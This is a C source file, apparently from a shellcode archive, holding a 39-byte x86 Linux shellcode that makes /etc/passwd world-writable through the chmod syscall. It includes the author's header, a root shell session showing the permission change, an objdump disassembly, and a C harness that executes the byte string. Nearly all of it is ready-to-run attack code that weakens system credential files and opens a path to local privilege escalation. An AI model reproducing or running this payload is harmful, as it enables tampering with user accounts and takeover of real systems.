/* Title : change mode 0777 of "/etc/passwd" with sys_chmod syscall Name : 39 bytes sys_chmod("/etc/passwd",599) x86 linux shellcode Date : may, 31 2009 Author : gunslinger_ Web : devilzc0de.com blog : gunslingerc0de.wordpress.com tested on : linux debian */ /* root@localhost:/home/gunslinger/shellcode# ls -la /etc/passwd -rw-r--r-- 1 root root 1869 2010-05-08 15:53 /etc/passwd root@localhost:/home/gunslinger/shellcode# gcc -o chmod chmod.c chmod.c: In function ‘main’: chmod.c:37: warning: incompatible implicit declaration of built-in function ‘strlen’ root@localhost:/home/gunslinger/shellcode# ./chmod Length: 39 root@localhost:/home/gunslinger/shellcode# ls -la /etc/passwd -rwxrwxrwx 1 root root 1869 2010-05-08 15:53 /etc/passwd root@localhost:/home/gunslinger/shellcode# chmod 644 /etc/passwd root@localhost:/home/gunslinger/shellcode# ls -la /etc/passwd -rw-r--r-- 1 root root 1869 2010-05-08 15:53 /etc/passwd root@localhost:/home/gunslinger/shellcode# objdump -d chmod chmod: file format elf32-i386 Disassembly of section .text: 08048060 <.text>: 8048060: eb 15 jmp 0x8048077 8048062: 31 c0 xor %eax,%eax 8048064: b0 0f mov $0xf,%al 8048066: 5b pop %ebx 8048067: 31 c9 xor %ecx,%ecx 8048069: 66 b9 ff 01 mov $0x1ff,%cx 804806d: cd 80 int $0x80 804806f: 31 c0 xor %eax,%eax 8048071: b0 01 mov $0x1,%al 8048073: 31 db xor %ebx,%ebx 8048075: cd 80 int $0x80 8048077: e8 e6 ff ff ff call 0x8048062 804807c: 2f das 804807d: 65 gs 804807e: 74 63 je 0x80480e3 8048080: 2f das 8048081: 70 61 jo 0x80480e4 8048083: 73 73 jae 0x80480f8 8048085: 77 64 ja 0x80480eb root@localhost:/home/gunslinger/shellcode# */ #include char sc[] = "\xeb\x15\x31\xc0\xb0\x0f\x5b\x31\xc9\x66\xb9\xff\x01\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe6\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"; int main(void) { fprintf(stdout,"Length: %d\n",strlen(sc)); (*(void(*)()) sc)(); return 0; }